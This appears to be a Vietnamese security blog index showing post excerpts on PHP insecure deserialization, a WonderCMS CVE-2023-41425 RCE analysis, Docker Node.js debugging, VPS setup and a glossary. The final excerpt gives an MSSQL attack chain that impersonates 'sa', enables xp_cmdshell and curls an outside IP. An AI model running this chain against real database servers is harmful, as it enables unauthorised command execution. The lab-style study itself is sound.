Insecure Deserialization trong PHP Insecure Deserialization: Là một lỗ hổng bảo mật cho phép kẻ tấn công (attacker) có thể chỉnh sửa, thay đổi kết cấu của các đối tượng (object) bằng cách tác động vào các untrust data khi tiến hành khi thực hiện Deserialize của ứng dụng. - Serialize: Khi dữ liệu muốn được lưu trữ, hay muốn truyền tải qua mạng hay một ứng dụng khác, người ta sẽ serialize dữ liệu tức là chuyển đổi dữ liệu gốc (orginal data) thành một mảng byte (byte stream). Điều này giúp cho việc chuyển tiếp dữ liệu đảm bảo được tính toàn vẹn, tối ưu hệ thống, tăng đáng kể tốc độ tính toán,... - Deserialize: Là quá trình ngược của Serialize, dùng để biến đổi mảng byte (byte stream) lại thành giữ liệu gốc dựa vào byte stream đã được cung cấp. Ý tưởng của việc tấn công này là sẽ cung cấp byte steam fake, khi ứng dụng des -> nó bị tấn công -------------------------------------------------------------- Lười sửa và viết, nào rảnh sửa lại Ví dụ về 1 bài insecure deserialize bằng PHP ...
Bài đăng
CVE-2023–41425 but only RCE part
- Nhận đường liên kết
- X
- Ứng dụng khác
CVE-2023–41425 Lời nói đầu: Bài viết này có ở đây để mình hiểu sâu hơn về cách tìm lỗi trong các mã nguồn CMS, rất mong được mọi người đón nhận và sửa lỗi nếu có sai sót. ---------------------------------------------------------------------------------------------------------------------------- Đầu tiên lên nvd.nist.gov để tìm hiểu lỗi. Như trên hình thì nó cho ta biết một lỗi XSS tại version 3.2.0->3.4.2 của Wonder CMS có thể dẫn đến RCE thông qua installModule component. Mình cũng nói trước là mình chỉ research RCE part, còn XSS thì mình sẽ không quan tâm mặc dù nó cũng trong phần Attack Chain Tiến hành download bản lỗi, tại đây mình download bản 3.4.2 cũng tức là bản đang có lỗi này. Tại dòng 146, mình thấy có hàm installUpdateModuleAction(). Tuy nhiên, dòng 142 cho biết chúng ta phải đăng nhập mới có thể sử dụng tính năng này. -> cần xác thực Vì muốn hiểu cách thức RCE nên mình sẽ bỏ qua phần xác thực, tiến hành đăng nhập luôn Hàm này sẽ hoạt động như nào...
Debug Nodejs via Docker
- Nhận đường liên kết
- X
- Ứng dụng khác
Bạn cần một tâm hồn đẹp trước khi làm cái này. Mình tốn kha khá thời gian đọc shjtposting và xem youtube đấy nên tóm lại cho nhanh Bước 1: Chuẩn bị source code, mình sẽ demo với cấu trúc dự án basic như này Bước 2: Tạo Dockerfile chứa nội dung sau file này sẽ chạy chương trình ở port 1337 và sẽ chạy chế độ debug ở port 9229 mình sẽ nói sau Bước 3: Trong package.json thêm đoạn này vô, chú ý port 9229 là để mở debug ở 9229. Thực ra nó cũng được mà chả cũng không. Vì mình làm theo nhiều clip quá nên h cứ bị lộn xào đấy :v Bước 4: Trong file launch.json thì sửa như này Bước 5: Build docker docker build -t konchan . docker run -d -p 1337:1337 -p 9229:9229 -V Bước 6: Vô web và dùng Inspect như thường
Cài đặt VPS ubuntu và chạy web php
- Nhận đường liên kết
- X
- Ứng dụng khác
Bài này mình sẽ hướng dẫn cho các bạn triển khai web chạy php, mysql, nginx - Cài đặt firewall + sudo apt install ufw - Kiểm tra firewall có bật không + sudo ufw status - Cho phép ssh + sudo ufw allow ssh + sudo ufw allow 22 + sudo ufw allow from <ip> - Update lại hệ thống và cài đặt nginx + sudo apt update + sudo apt install nginx - Kiểm tra lại nginx đã bật hay chưa. + sudo ufw app list Như thế này thì các bạn đã có thể truy cập thông qua ip rồi nhé, nó sẽ ở thư mục /var/www/html/<chjt_loli> - Cài đặt mysql-server sudo apt install mysql-server - Cài đặt các gói cho php + apt install php-fpm php-mysql - Sửa file /etc/nginx/sites-enabled/defautl để nhận đuôi php + sudo nano /etc/nginx/sites-enabled/default -> index.php - Reload lại ...
Thuat ngu
- Nhận đường liên kết
- X
- Ứng dụng khác
Access Control List (ACL) Access Control Entries (ACEs) - Discretionary Access Control List (DACL): check for level of access - System Access Control Lists (SACL) Access denied ACE Access allowed ACE System audit ACE Domain trust - Parent-child - Cross-link - External - Tree-root - Forest - Enhanced Security Admin Environment (ESAE) Network Interface Card (NIC) card mạng Carrier Sense Multiple Access with Collision Detection (CSMA/CD) Windows Management Instrumentation Command-line (WMIC) Web-Based Enterprise Management (WBEMc) New Technology Directory Services Directory Information Tree (NTDS.DIT) Microsoft’s Active Directory Domain Services (AD DS) User Account Control (UAC) Dynamic Link Library (DLL) BPA (Block Public Access) Fully Qualfied Domain Name (FQDN) Public key infrastructure ( PKI)
Thực thi RCE via MSSQL CLI
- Nhận đường liên kết
- X
- Ứng dụng khác
-- Switch to the 'sa' user context EXECUTE AS LOGIN='sa'; -- Enable advanced options EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; -- Enable xp_cmdshell EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- Use xp_cmdshell to download the file using curl EXECUTE xp_cmdshell "curl http://10.10.14.61:1234/a";